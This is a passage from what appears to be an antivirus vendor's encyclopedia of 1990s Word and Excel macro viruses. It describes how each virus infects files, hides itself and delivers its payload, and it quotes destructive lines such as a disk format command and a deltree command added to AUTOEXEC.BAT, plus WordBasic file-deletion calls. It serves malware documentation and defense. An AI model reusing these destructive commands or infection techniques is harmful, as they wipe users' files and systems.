  14960.  
  14961.   "The taste of fame just got tastier!
  14962.    VLAD Australia does it again with
  14963.    the world's first Win95 Virus.
  14964.  
  14965.    From the old school to the new.
  14966.  
  14967.    Metabolis
  14968.    Qark
  14969.    Darkman
  14970.    Automag
  14971.    Antigen
  14972.    RhinceWind
  14973.    Quantum
  14974.    Absolute Overload
  14975.    CoKe"
  14976.  
  14977. The virus also contains the following text string:
  14978.  
  14979.   "Please note: the name of this virus is [Bizatch]
  14980.    written by Quantum of VLAD"
  14981.  
  14982. [WORD_Demonstrate]
  14983. Virus Name: WORD_Demonstrate (Demonstration Macro Virus)
  14984. Virus Type: Word macro virus
  14985. Virus Length: N/A
  14986.  
  14987. Description: This virus infects MS Word documents.
  14988.  
  14989. This virus consists of the following macro:
  14990.  
  14991.     AutoClose
  14992.  
  14993. When an infected file is opened, the virus infects the
  14994. global template "Normal.dot" by inserting a single
  14995. macro.
  14996.  
  14997. Once the virus is active, it will infect all new
  14998. documents when they are closed.
  14999.  
  15000.  
  15001. [Winexcel_DMV]
  15002. Virus Name: Winexcel_DMV (Demonstration Macro Virus)
  15003. Virus Type: Excel macro virus
  15004. Virus Length: N/A
  15005.  
  15006. Description: This virus infects MS Excel documents.
  15007.  
  15008. This virus consists of the following macros:
  15009.  
  15010.     AutoClose
  15011.  
  15012. When an infected file is closed, the virus adds a
  15013. single macro to the global macro file.  Subsequent
  15014. files which are closed also have the macro attached.
  15015.  
  15016. This virus does not work because of a bug in the
  15017. program.
  15018.  
  15019.  
  15020. [WORD_Xenixos]
  15021. Virus Name: WORD_Xenixos
  15022. Alias Name: Nemesis, Xos, Evil One, Xenixos:De
  15023. Virus Type: Word macro virus
  15024. Virus Length: 31342 Bytes (11 Macros)
  15025. Infection: German Microsoft Word documents and templates
  15026.  
  15027. Symptoms:Text added to printed documents
  15028.          Format of C:\ drive
  15029.          Change of C:\AUTOEXEC.BAT
  15030.          Display of windows
  15031.  
  15032. Description: This virus infects MS Word documents.
  15033. Xenixos is the first macro virus that was written especially
  15034. for the German version of Microsoft Word. All macro
  15035. names are in German, and therefore it only works with the
  15036. German Word version. The virus was found in Austria, and
  15037. is also posted in Usenet.
  15038.  
  15039. The following macros can be found in infected documents
  15040. and viewed with the Datei|Dokumentvorlage|Organisieren|Makros command.
  15041.  
  15042. "AutoExec"
  15043. "AutoOpen"
  15044. "DateiBeenden"
  15045. "DateiDrucken"
  15046. "DateiDruckenStandard"
  15047. "DateiOeffnen"
  15048. "DateiSpeichern"
  15049. "DateiSpeichernUnter"
  15050. "Drop"
  15051. "Dummy"
  15052. "ExtrasMakro"
  15053.  
  15054. The infected global template (NORMAL.DOT) includes
  15055. the following additional macros:
  15056.  
  15057. "AutoClose"
  15058. "AutoExit"
  15059. "AutoNew"
  15060.  
  15061. They all contain the empty macro "Dummy".
  15062.  
  15063. Upon opening of an infected document, Xenixos infects
  15064. the global template unless the "DateiSpeichernUnter"
  15065. macro is already present. Xenixos spreads upon using the
  15066. "DateiSpeichern" ("FileSave") and "DateiSpeichernUnter"
  15067. ("FileSaveAs") command. All its macros are Execute-Only,
  15068. and therefore they can not be viewed or modified. Files with
  15069. the name "VIRUS.DOT" will not become infected.
  15070.  
  15071. During infection, Xenixos checks the system date and then
  15072. activates various destructive payloads according to the
  15073. date. During the month of May it adds the following
  15074. text to "C:\AUTOEXEC.BAT":
  15075.  
  15076. "    @echo j format c: /u > nul   "
  15077.  
  15078. This will format the C:\ drive if the DOS "format"
  15079. command is present.
  15080.  
  15081. During the month of March, Xenixos tries to activate the
  15082. DOS-Virus "Neuroquila" by using a DOS DEBUG script.
  15083. This part of the virus is faulty (it tries to create an .EXE file)
  15084. and therefore the DOS-based virus never infects the system.
  15085.  
  15086. The third destructive payload checks the system time,
  15087. and in case of a value bigger than 45 in the seconds field,
  15088. it will add the password "XENIXOS" to a saved document.
  15089.  
  15090. Upon printing a document, Xenixos checks the system
  15091. time again, and in case of a value smaller than 30 in the
  15092. seconds field, it will add the following text to the end of the
  15093. printed document:
  15094.  
  15095. "    Nemesis Corp.                          "
  15096.  
  15097. Xenixos also includes some additional tricks to make its
  15098. detection more difficult. It turns off the prompting of
  15099. Word before saving a modified global template and replaces
  15100. the Tools|Macros command with a code that will display the
  15101. following error message instead of the activation of
  15102. Word's built-in macro viewer/editor:
  15103.  
  15104. "  Diese Option ist derzeit leider nicht verfuegbar    "
  15105.  
  15106. (This prevents the user from seeing the virus macros).
  15107.  
  15108. Upon starting MS Word, Xenixos copies parts of its virus
  15109. macros and saves them with new names, (for example:
  15110. "DateiSpeichern" -> "DateiSpeichernBak").
  15111. After a document is opened, Xenixos restores its backups.
  15112.  
  15113. The following text is also found in the virus code, yet is
  15114. never displayed:
  15115.  
  15116. " Brought to you by the Nemesis Corporation (c) 1996 "
  15117.  
  15118. In addition, Xenixos changes section "Compatibility"
  15119. inside the WIN.INI file.  It sets the variable "RR2CD"
  15120. to the value "0x0020401", and the variable "Diag$" to
  15121. "0". The WIN.INI variables can be used to deactivate
  15122. the virus.  Setting the variable "Diag$" to "1" will
  15123. prevent most of the destructive payloads.
  15124.  
  15125. Some replicants of Xenixos will also display the following
  15126. Wordbasic error message:
  15127.  
  15128. "  Falscher Parameter  "
  15129.  
  15130.  
  15131. [WORD_Wieder]
  15132. Virus name: WORD_Wieder (a.k.a. Pferd, Wieder÷ffnen)
  15133. Number of macros: 2
  15134. Encrypted: No
  15135. Macro names: AutoOpen, AutoClose
  15136. Size of macros: 638 Bytes
  15137. Place of origin: Germany
  15138. Date of origin: Spring 1996
  15139. Destructive: Yes
  15140. Common In-The-Wild: No
  15141. Description:
  15142.  
  15143. Wieder is a not a virus but a trojan horse. It does not infect
  15144. other files.
  15145.  
  15146. When an infected document is opened, Wieder creates the directory
  15147. "C:\TROJA", and moves the system file "C:\AUTOEXEC.BAT" into the
  15148. newly created directory. After moving the file the original files
  15149. are deleted.
  15150.  
  15151. When closing an infected document, the following text is displayed:
  15152.  
  15153. "   Auf Wieder÷ffnen   "
  15154.  
  15155. "   P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei   "
  15156. "   gerne wiederhaben moechten, sollten Sie einen   "
  15157. "   Blick in das neue Verzeichnis C:\TROJA werfen...   "
  15158.  
  15159. The original document, which included the trojan, has the
  15160. following text:
  15161.  
  15162. "   Trojanisches Pferd   "
  15163. "   Wenn Sie diese Zeilen lesen, wurde bereits Ihre AUTOEXEC.BAT-   "
  15164. "   Datei aus dem Hauptverzeichnis C:\ entfernt. Hoffentlich haben   "
  15165. "   Sie eine Kopie davon ?   "
  15166.  
  15167. "   Genauso einfach waere es gewesen, Ihre Festplatte zu loeschen   "
  15168. "   und mit ein klein wenig mehr Aufwand koennte man auch einen   "
  15169. "   Virus installieren.   "
  15170.  
  15171. [WORD_Wazzu]
  15172. Virus name: WORD_Wazzu
  15173. Number of macros: 1
  15174. Encrypted: No
  15175. Macro names: AutoOpen
  15176. Size of macros: 632 Bytes
  15177. Place of origin: Washington, USA
  15178. Date of origin: Posted to Usenet in April 1996
  15179. Destructive: Yes
  15180. Common In-The-Wild: Yes
  15181. Description:
  15182.  
  15183. When an infected document is opened, Wazzu.A checks the name of
  15184. the active document. If it is "normal.dot", then the virus macro
  15185. is copied from the global template to the open document.
  15186. Otherwise normal.dot becomes infected.
  15187.  
  15188. Wazzu does not check if a document is already infected. It simply
  15189. overwrites the "autoopen" macro.
  15190.  
  15191. Wazzu has a destructive payload. It picks a random number between
  15192. 0 and 1 and if the number smaller than 0.2 (probability of 20 percent),
  15193. the virus will move a word from one place in the document to another.
  15194. This is repeated three times. So the probability for a Word to be
  15195. moved is 48.8 percent. After the third time, Wazzu picks a final
  15196. random number (between 0 and 1) and if the value is higher than 0.25
  15197. (probability of 25 percent), the word "Wazzu" will be inserted into
  15198. the document.
  15199.  
  15200. After an infected documents is cleaned, it has to be checked really
  15201. careful because chances of having a modified document (words swapped
  15202. or added) are over 61 percent. This can be a very time consuming job
  15203. with large documents.
  15204.  
  15205. Wazzu is a nickname for the Washington State University.
  15206.  
  15207. [WORD_Reflex]
  15208. Virus Name: WORD_Reflex
  15209. Alias Name: RedDwarf
  15210. Virus Type: Word macro virus
  15211. Virus Length: 897 Bytes in .doc files and 1226
  15212.             Bytes in .dot files (3 or 4 Macros)
  15213. Symptoms: Display of Windows
  15214. Place of origin: Ireland
  15215. Description: This virus infects MS Word documents.
  15216.  
  15217. Delete virus macros from infected documents
  15218. (AutoOpen, FClose, FileClose, FA)
  15219. Reflex contains 3 encrypted macros (Execute-Only) with
  15220. a size of 897 Bytes.
  15221. "AutoOpen"
  15222. "FClose"
  15223. "FileCLose"
  15224. An infected global template contains one more macro
  15225. ("FA"). Upon infection, Reflex turns off the prompting of
  15226. Word to ensure a hidden infection of the global template
  15227. (NORMAL.DOT). Infected documents are saved with the
  15228. password "Guardian." They are also converted internally
  15229. to templates, which is very common for macro viruses.
  15230.  
  15231. Reflex was written at an antivirus conference after an
  15232. Anti-Virus company announced a challenge to hackers
  15233. to break its new technology. Any author of a new
  15234. undetected macro virus was supposed to receive
  15235. champagne as a reward.
  15236.  
  15237. When Reflex infects a file it displays the following window:
  15238. "Now, Where's that Jerbil of Bubbly? "
  15239.  
  15240. Some replicants of Reflex will also display the following
  15241. Wordbasic error message:
  15242.  
  15243. "Document not open"
  15244.  
  15245.  
  15246. [WORD_Polite]
  15247. Virus name: WORD_Polite (a.k.a. WW2Demo)
  15248. Number of macros: 2
  15249. Encrypted: No
  15250. Macro names: FileClose, FileSaveAs
  15251. Size of macros: 1918 Bytes
  15252. Place of origin: USA
  15253. Date of origin: March, 1996
  15254. Destructive: No
  15255. Common In-The-Wild: No
  15256. Description:
  15257.  
  15258. Polite was first created with Microsoft version 2.0, yet also works with
  15259. higher versions of Microsoft Word.
  15260.  
  15261. Polite can be called a demonstration virus and is very unlikely to spread.
  15262. Before each attempted infection, it displays a window with the following
  15263. question:
  15264.  
  15265. "   Shall I infect the file ?   "
  15266.  
  15267. If the user answers with the "No" button, no document becomes infected.
  15268. While it asks for permission to infect files, it does not ask for
  15269. permission to infect the global template (NORMAL.DOT).
  15270.  
  15271. Upon infection of the global template (when an infected document
  15272. is closed), Polite displays the following message:
  15273.  
  15274. "   I am alive!   "
  15275.  
  15276. Once Polite infects a Word 6.0/7.0 document it can not infect Word 2.0
  15277. documents anymore.
  15278.  
  15279. [WORD_Pheeew]
  15280. Virus Name: WORD_Pheeew
  15281. Alias Name: Dutch, NietGoed, Pheeew:NL
  15282. Virus Type: Word macro virus
  15283. Virus Length: 2759 Bytes (4 Macros)
  15284. Symptoms: Displays text, deletes files in C:\ and C:\DOS
  15285. Place of origin: Unknown
  15286. Description: This virus infects MS Word documents.
  15287.  
  15288. Pheeew is the first macro virus written for the Dutch
  15289. version of Word. This virus is strongly based on the
  15290. Concept macro virus, and has four unencrypted macros:
  15291.  
  15292. "AutoOpen"
  15293. "IkWordNietGoed1"
  15294. "IkWordNietGoed2"
  15295. "Lading"
  15296.  
  15297. Pheeew checks for previous infection of the global
  15298. template (NORMAL.DOT) when an infected document
  15299. is opened. The virus does this by checking for
  15300. two macros, namely "Lading" and "BestandOpslaanAls."
  15301. If the template is not infected, Pheeew copies its
  15302. viral macros into the global template. The macro
  15303. "IkWordNietGoed2" is saved under the name
  15304. "BestandOpslaanAls" (FileSaveAs).
  15305.  
  15306. When the "FileSaveAs" command is used documents
  15307. become infected. These documents are also saved
  15308. as templates (a common behavior for macro viruses).
  15309. After infecting, Pheeew displays various windows with
  15310. the following message:
  15311.  
  15312. Window "Important":
  15313. " Gotcha ! "
  15314. Window "FINAL WARNING!":
  15315. "STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC"
  15316.  
  15317. Clicking "No" at the last window causes Pheeew to
  15318. activate its dangerous payload--all files in C:\
  15319. and C:\DOS are deleted (certain file attributes are
  15320. bypassed).
  15321.  
  15322. Pheeew also contains the following texts:
  15323.  
  15324. "Done by the Catman "
  15325. Macro "Lading":
  15326. " Sub MAIN                                                         "
  15327. "   REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC             "
  15328. "   REM              *** WARNING ***                               "
  15329. "   REM You're computer could be killed right now!                 "
  15330. "   REM Thank to you and me it's still ok!                         "
  15331. "   REM Next time will be worse!                                   "
  15332. "   REM              *** PHEEEW! ***                               "
  15333. "   REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC             "
  15334. " End Sub                                                          "
  15335.  
  15336.  
  15337. [WORD_PCW]
  15338. Virus Name: WORD_PCW
  15339. Alias Name: Birthday, B-Day, Suzanne
  15340. Virus Type: Word macro virus
  15341. Virus Length: 1039 Bytes (2 Macros)
  15342. Symptoms: Display of message
  15343. Place of origin: German computer magazine
  15344. Description: This virus infects MS Word documents.
  15345.  
  15346. PCW contains two encrypted (Execute-Only) macros
  15347. with a size of 1039 Bytes.
  15348. "AutoOpen"
  15349. "DateiSpeichernUnter"
  15350. The name was selected because its code was published
  15351. in the German magazine "PC Welt". We expect to see
  15352. other variants of this virus, since the code was available
  15353. to the public.
  15354.  
  15355. Upon opening an infected document, PCW will infect
  15356. the global template (NORMAL.DOT). Further
  15357. documents are infected when the "DateiSpeichernUnter"
  15358. command is used. Infected documents are internally
  15359. converted into templates, which is very common for
  15360. macro viruses. PCW is also known under the name
  15361. "Birthday", since it displays the following window:
  15362.  
  15363. " Happy Birthday! Herzlichen Glⁿckwunsch... "
  15364.  
  15365. PCW uses German macro names and will therefore only
  15366. work with the German version of Microsoft Word.
  15367.  
  15368.  
  15369. [WORD_Nuclear]
  15370. Virus name: WORD_Nuclear (a.k.a. Alert)
  15371. Number of macros: 9
  15372. Encrypted: Yes
  15373. Macro names: AutoExec, AutoOpen, DropSuriv, FileExit, FilePrint,
  15374.               FilePrintDefault, FileSaveAs, InsertPayload, Payload
  15375. Size of macros: 10556 Bytes
  15376. Place of origin: Australia
  15377. Date of origin: September, 1995
  15378. Destructive: Yes
  15379. Common In-The-Wild: Yes
  15380. Description:
  15381.  
  15382. Nuclear was the second macro virus found "In-the-Wild" (after Concept).
  15383. It was distributed, over the Internet in a document with information about
  15384. the Concept virus. It was also the first macro virus that uses Execute-Only
  15385. (encrypted) macros to make analysis more difficult.
  15386.  
  15387. Nuclear is activated with the "AutoExec" and "AutoOpen" macro. Before
  15388. it infects the global template (normal.dot), it checks for a previous
  15389. infection. It does not infect if it finds the "AutoExec" macro.
  15390. Documents become infected when they are saved with the "FileSaveAs"
  15391. command.
  15392.  
  15393. After the virus macros have been transfered to the global template,
  15394. Nuclear calls some destructive payloads. The first payload tries to
  15395. drop the "Ph33r" virus. Between 17:00 and 17:59, Nuclear creates a
  15396. text file including a script of the DOS/Windows-EXE virus "Ph33r".
  15397. It then uses the DOS command "DEBUG.EXE" to convert the file into
  15398. an executable file. It also creates the "EXEC_PH.BAT" batch file, and
  15399. calls it via a Dos shell. This last infection routine is faulty, the
  15400. DOS-window is closed immediately, and the "Ph33r" virus never infects
  15401. the system.
  15402.  
  15403. The second payload, upon printing a document, Nuclear checks the
  15404. system time and in case of a value bigger than 55 in the seconds
  15405. field, it adds the following text to the end of the printed document:
  15406.  
  15407. "   And finally I would like to say:   "
  15408.  
  15409. "   STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC   "
  15410.  
  15411. The third destructive payload is activated on April 5th, when Nuclear
  15412. deletes the system files "C:\IO.SYS", "C:\MSDOS.SYS" and "C:\COMMAND.COM.
  15413.  
  15414. This leaves the computer unbootable.
  15415.  
  15416. [WORD_NOP]
  15417. Virus name: WORD_Nop:De
  15418. Number of macros: 2
  15419. Encrypted: No
  15420. Macro names: AutoOpen, NOP (DateiSpeichern)
  15421. Size of macros: 246 Bytes
  15422. Place of origin: Germany
  15423. Date of origin: Summer, 1996
  15424. Destructive: No
  15425. Common In-The-Wild: Yes
  15426. Description:
  15427.  
  15428. WORD_NOP is a very primitive virus and has only very few necessary
  15429. commands in order to replicate. The only special characteristic
  15430. of the NOP virus is that it turns off the prompting of Word
  15431. before saving the global template (NORMAL.DOT).
  15432.  
  15433. When an infected document is opened, NOP transfers itself to the
  15434. global template and renames "NOP" into "DateiSpeichern".
  15435. Additional documents become infected when they are saved.
  15436.  
  15437. [WORD_NF]
  15438. Virus Name: WORD_NF
  15439. Alias Name: Names, NF:De
  15440. Virus Type: Word macro virus
  15441. Virus Length: 4209 Bytes (6 Macros)
  15442. Symptoms: Display of Windows
  15443. Place of origin: United States
  15444. Description: This virus infects MS Word documents.
  15445.  
  15446. NF contains 2 encrypted macros (Execute-Only) with
  15447. a size of 286 Bytes.
  15448.  
  15449. "AutoClose"
  15450. "NF"
  15451.  
  15452. When an infected document is opened, NF will infect
  15453. the global template (NORMAL.DOT). Further documents are
  15454. infected when they are closed. Infected documents are converted
  15455. internally to templates which is very common for macro viruses.
  15456. Upon infection, NF will display the following message at the bottom
  15457. of the screen:
  15458.  
  15459. "Traced!"
  15460.  
  15461. NF is one of the very few non-destructive macro viruses.
  15462.  
  15463. [WORD_MDMA]
  15464. Virus Name: WORD_MDMA
  15465. Alias Name: StickyKeys, MDMA-DMV
  15466. Virus Type: Word macro virus
  15467. Virus Length: 1635 Bytes (1 Macro)
  15468. Symptoms: Files are deleted
  15469. Place of origin: United States
  15470. Description: This virus infects MS Word documents.
  15471.  
  15472. MDMA is the first macro virus that will work on
  15473. Windows, Windows 95, Macintosh and Windows NT.
  15474. It can be a very destructive macro virus, and Word users
  15475. are strongly advised to check their system with an
  15476. up-to-date anti-virus program.
  15477.  
  15478. MDMA contains only one macro with a size of 1635 Bytes.
  15479.  
  15480. "AutoClose"
  15481.  
  15482. When an infected document is opened and then closed,
  15483. MDMA infects the global template (NORMAL.DOT).
  15484. Further documents are infected when they are closed ("AutoClose").
  15485. Infected documents are also converted to templates which is very
  15486. common for macro viruses.
  15487.  
  15488. If an infected document is loaded on the first of each month,
  15489. MDMA activates its destructive payloads. The following payloads
  15490. will be executed depending on the operating system:
  15491.  
  15492. Windows:
  15493. --------
  15494. Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat
  15495. This will delete all the directories on the C:\ drive.
  15496.  
  15497. Windows NT:
  15498. -----------
  15499. Kill "*.*"; Kill "c:\shmk."
  15500. This will delete all the files on the C:\ drive
  15501.  
  15502. Macintosh:
  15503. ----------
  15504. Kill MacID$("****")
  15505. This will delete all files on the hard drive.
  15506.  
  15507. Windows 95:
  15508. -----------
  15509. Kill "c" \shmk."; Kill "c:\windows\*.hlp";
  15510. Kill "c:\windows\system\*.cpl"
  15511. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  15512. Panel\Accessibility\Stickykeys", "On", "1", "")
  15513. SetPrivateProfileString
  15514. ("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","")
  15515. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  15516. Panel\Accessibility\HighContrst", "On", "1", "")
  15517.  
  15518. MDMA will also display the following window:
  15519.  
  15520. "  You are infected with MDMA_DMV. Brought to you
  15521. by MDMA (Many Delinquent  "
  15522. "  Modern Anarchists)."
  15523.  
  15524. To combat destructive macro viruses, such as MDMA, we advise users
  15525. to use an up-to-date anti-virus program.
  15526.  
  15527. Microsoft has also released a new Microsoft Word version,
  15528. which will warn each time a suspicious macro is loaded.
  15529. Users can then decide if they want to disable the macro.
  15530.  
  15531. The Microsoft Word upgrade is available for a small fee from Microsoft.
  15532.  
  15533.  
  15534. [WORD_Maddog]
  15535. Virus Name: WORD_Maddog
  15536. Virus Type: Word macro virus
  15537. Virus Length: 4209 Bytes (6 Macros)
  15538. Symptoms: Documents contain the text string "MadDog"
  15539. Place of origin: Georgia, United States
  15540. Description: This virus infects MS Word documents.
  15541.  
  15542. Maddog contains 6 macros with a size of 4209 Bytes.
  15543.  
  15544. "AutoOpen"
  15545. "AutoClose"
  15546. "AutoExec"
  15547. "FileClose"
  15548. "FcFinish"
  15549. "AopnFinish"
  15550.  
  15551. When an infected document is opened, MadDog will infect the global
  15552. template (NORMAL.DOT). Further documents are infected when they are
  15553. close with the "FileClose" command. Upon closing a document, MadDog
  15554. saves various times to "Temp1" and then saves the active document.
  15555. Infected documents are converted internally into templates, which is
  15556. very common for macro viruses.
  15557.  
  15558. Infected documents contain the text string "MadDog".
  15559.  
  15560. [WORD_Tele]
  15561. Virus name: WORD_Tele (a.k.a LBYNJ, Telefonica, Tele-Sex)
  15562. Number of macros: 7
  15563. Encrypted: Yes
  15564. Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken,
  15565.               DateiNeu, DateiOeffnen, Telefonica
  15566. Size of macros: 22256 Bytes
  15567. Place of origin: Germany
  15568. Date of origin: April, 1996
  15569. Destructive: Yes
  15570. Common In-The-Wild: No
  15571. Description:
  15572.  
  15573. Tele's "AutoExec" macro includes the infection routine for the global
  15574. template (normal.dot), which will not get infected when inside the
  15575. WIN.INI file (entry "Compatibility"), the string "0x0030303" is
  15576. set to "LBYNJ".
  15577.  
  15578. Tele uses the "Telefonica" macro to check for a previous infection.
  15579. It will not infect the global template if the macro is already present.
  15580.  
  15581. Documents are infected upon "DateiBeenden" ("FileClose"), "DateiNeu"
  15582. ("FileNew") and "DateiOeffnen" ("FileOpen"), whereby at the end of
  15583. "DateiOeffnen" ("FileOpen") the macro "Telefonica" is called again.
  15584. Infected documents are changed to templates, which is very common for
  15585. macro viruses.
  15586.  
  15587. Tele has two destructive payloads. The first one can be found in the
  15588. "DateiDrucken" (FilePrint) macro. Upon printing a documtent, Tele
  15589. checks the system time and in case of a value less than 10 in the
  15590. seconds field, it will add the following text to the end of the
  15591. printed document:
  15592.  
  15593. "   Lucifer by Nightmare Joker (1996)   "
  15594.  
  15595. The second payload is activated from the "Telefonica" macro when the
  15596. second field has a value of 0 or 1. ("Telefonica" is called from
  15597. "AutoOpen", "AutoExec" and "DateiOeffnen"). Is this the case, Tele
  15598. creates a Debug script, (filename: TELEFONI.SCR), inside the "C:\DOS"
  15599. directory which includes the DOS based virus "Kampana.3784".
  15600.  
  15601. After creating the script file, LBYNJ executes the "TELEFONI.BAT" batch
  15602. file which uses the DOS command "DEBUG.EXE" to convert the script file
  15603. into an executable DOS-based virus and then starts it.
  15604.  
  15605. [WORD_Irish]
  15606. Virus Name: WORD_Irish
  15607. Virus Type: Word macro virus
  15608. Virus Length: 4152 Bytes (4 Macros)
  15609. Symptoms: Display of windows
  15610. Place of origin: USA
  15611. Description: This virus infects MS Word documents.
  15612.  
  15613. Irish contains 4 macros with a size of 4152 Bytes.
  15614.  
  15615. "AutoOpen"
  15616. "WordHelp"
  15617. "AntiVirus"
  15618. "WordHelpNT"
  15619.  
  15620. Upon opening an infected document, Irish will infect the
  15621. global template (NORMAL.DOT). An infected global
  15622. template contains the "FileSave" macro, instead of
  15623. "AutoOpen". Further documents are infected when the
  15624. "FileSave" command is used. Infected documents are
  15625. converted internally to templates which is very common
  15626. for macro viruses.
  15627.  
  15628. Two of the macros, "WordHelp" and "WordHelpNT",
  15629. do not run automatically. However, when executed
  15630. manually by the user, they will change the Windows
  15631. desktop color to green.
  15632.  
  15633. The macro "WordHelpNT" contains a payload which
  15634. attempts to activate the screen saver and display the
  15635. following message:
  15636.  
  15637. "Happy Saint Patties Day "
  15638.  
  15639. However, the payload seems to be faulty and does not
  15640. work under Windows 95 (Irish only exists in Microsoft Word).
  15641.  
  15642. [WORD_DMV]
  15643. Virus name: WORD_DMV (a.k.a. Demonstration)
  15644. Number of macros: 1
  15645. Encrypted: No
  15646. Macro names: AutoClose
  15647. Size of macros: 3002 Bytes
  15648. Place of origin: USA
  15649. Date of origin: Fall, 1994
  15650. Destructive: No
  15651. Common In-The-Wild: No
  15652. Description:
  15653.  
  15654. DMV was the first macro virus written by Joel McNamara, who published
  15655. a detailed paper about macro viruses. It is believed that DMV invited
  15656. additional virus authors to write Word macro viruses. While the paper
  15657. was not published until Concept was discovered, it helped virus authors
  15658. to use new techniques.
  15659. Joel McNamara also published an Excel macro virus, which is non
  15660. functional (EXCEL_DMV.A)
  15661.  
  15662. DMV infects the global template (normal.dot) when an infected document
  15663. is closed. Further documents become infected when they are alse closed.
  15664.  
  15665. Upon infection, DMV displays the following messages:
  15666.  
  15667. "   Counting global macros   "
  15668.  
  15669. "   AutoClose macro virus is already installed in NORMAL.DOT.   "
  15670.  
  15671. "   Infected NORMAL.DOT with a copy of AutoClose macro virus.   "
  15672.  
  15673. "   AutoClose macro virus already present in this document.   "
  15674.  
  15675. "   Saved current document as template.   "
  15676.  
  15677. "   Infected current document with copy of AutoClose macro virus.   "
  15678.  
  15679. "   Macro virus has been spread. Now execute some other code   "
  15680. "                 (good, bad, or indifferent).                 "
  15681.  
  15682. [WORD_Hot]
  15683. Virus name: WORD_Hot
  15684. Number of macros: 4
  15685. Encrypted: Yes
  15686. Macro names: AutoOpen, DrawBringInFrOut, InsertPBreak,
  15687.               ToolsRepaginat, FileSaveAs, StartOfDoc
  15688. Size of macros: 5515 Bytes
  15689. Place of origin: Unknown
  15690. Date of origin: January, 1996
  15691. Destructive: Yes
  15692. Common In-The-Wild: Yes
  15693. Description:
  15694.  
  15695. When an infected document is opened the virus is activated by
  15696. the AutoOpen macro. Some replicated Hot samples also display the
  15697. following error message:
  15698.  
  15699. "   Unable to load the specified library   "
  15700.  
  15701. Hot turns off the prompting of Word to ensure a hidden infection
  15702. of the global template (normal.dot). It also checks the file
  15703. "WINWORD6.INI" for the following entry: "QLHot". If not present,
  15704. Hot records a "hot date", 14 days in the future. Is this variable
  15705. is not already set, the global template becomes infected.
  15706.  
  15707. The InsertPBreak/InsertPageBreak insert a page-break into the
  15708. current document. However, it is also used by the virus to
  15709. recognise if a document is already infected.
  15710.  
  15711. Some of the macros are renamed when they are copied by the WordBasic
  15712. "MacroCopy" command:
  15713.  
  15714. "AutoOpen"          becomes  "StartOfDoc"
  15715. "DrawBringInFrOut"  becomes  "AutoOpen"
  15716. "InsertPBreak"      becomes  "InsertPageBreak"
  15717. "ToolsRepaginat"    becomes  "FileSave"
  15718.  
  15719. In addition the global template contains the following macros:
  15720.  
  15721. "FileSave" (similar to "ToolsRepaginat")
  15722. "StartOfDoc" (similar to "AutoOpen")
  15723.  
  15724. Hot also uses special functions from the Windows file
  15725. "KERNEL.EXE" (Win API). It uses the API to find the path for
  15726. Windows and to open files which are only very simple functions.
  15727. It should be noted that many other options were available to the
  15728. virus author.
  15729.  
  15730. The destructive payload, which is reached upon arrival of the
  15731. hot date" set under the "QLHot" section in the WINWORD6.ini file,
  15732. deletes text from the current active document. This payload is
  15733. bypassed if the file EGA5.CPI is present in the "C:\DOS" directory.
  15734.  
  15735. A comment in the virus source code suggests that this is a
  15736. "feature" designed to protect the virus author and his friends.
  15737.  
  15738.  
  15739. [WORD_Hassle]
  15740. Virus Name: WORD_Hassle
  15741. Alias Name: Bogus
  15742. Virus Type: Word macro virus
  15743. Virus Length: 8283 Bytes (7 Macros)
  15744. Symptoms: Display of windows
  15745. Place of origin: USA
  15746. Description: This virus infects MS Word documents.
  15747.  
  15748. Hassle contains 7 encrypted (Execute-Only) macros with
  15749. a size of 8283 Bytes.
  15750.  
  15751. "AutoClose"
  15752. "ToolsMacro"
  15753. "Microsoft01"
  15754. "Microsoft02"
  15755. "Microsoft03"
  15756. "Microsoft04"
  15757. "Microsoft05"
  15758.  
  15759. When an infected document is opened, Hassle will
  15760. infect the global template (NORMAL.DOT). Hassle
  15761. uses macro stealth techniques to hide itself. It uses the
  15762. macro "ToolsMacro" to make recognition of an infected
  15763. document more difficult. If the user selects any command,
  15764. it will display the following windows and close Microsoft
  15765. Word:
  15766.  
  15767. " Out of Memory or System Resources"
  15768.  
  15769. Hassle is one of the very few non-destructive macro viruses.
  15770. It only infects other files and displays the following
  15771. text window:
  15772.  
  15773. "Are you sure to Quit?"
  15774.  
  15775. This only occurs seldomly, with a 5% probability.
  15776.  
  15777. Another payload asks the user to register a software with
  15778. Microsoft. Hassle will only accept one answer, which
  15779. is as follows:
  15780.  
  15781. "Bill Gates", "Microsoft" and "666"
  15782.  
  15783. Whenever the user selects the Tools/Macro command,
  15784. Hassle will display the following text at the bottom of
  15785. the screen:
  15786.  
  15787. " Microsoft Word Assistant Version 6.2"
  15788.  
  15789.  
  15790. [WORD_HiSexy]
  15791. Virus Name: WORD_HiSexy
  15792. Alias Name: Teaside, Guess, Phantom
  15793. Virus Type: Word macro virus
  15794. Platform: Word 6/7
  15795. Number of Macros: 1
  15796. Encrypted: No
  15797. Size of Macros: 1126 Bytes
  15798. Place of Origin: Germany
  15799. Date of Origin: May, 1996
  15800. Destructive: Yes
  15801. Trigger Date: None
  15802. Password: None
  15803. Seen In The Wild: No
  15804.  
  15805. Description:
  15806. When an infected document is opened, HiSexy checks if the
  15807. document variables are set to "populated". If this is not
  15808. the case, a new global template (normal.dot) is created and
  15809. the virus macro "AutoOpen" is copied into the new document.
  15810. After that, the variable is set to "populated" in order to
  15811. mark the file as infected. If the variable is already set,
  15812. the virus infects the new document by transfering the
  15813. "AutoOpen" macro using the MakroCopy command.
  15814.  
  15815. HiSexy is the first macro virus to use the document variables
  15816. as a checking mechanism for already infected documents.
  15817.  
  15818. Because of an error inside the virus code, the virus does not
  15819. replicate properly.
  15820.  
  15821. Upon a random number (between 0 and 100), HiSexy activates
  15822. various destructive payloads. It changes the active font size
  15823. or creates a new document with the following text:
  15824.  
  15825. "   The word is out.   "
  15826. "   The word is spreading...   "
  15827. "   The Phantom speaks...   "
  15828. "   Sedbergh   "
  15829. "   is CRAP   "
  15830. "   The word spreads...   "
  15831.  
  15832. The text will then be printed out.
  15833.  
  15834. The following texts will be inserted into the active document
  15835. upon a calculated random number:
  15836.  
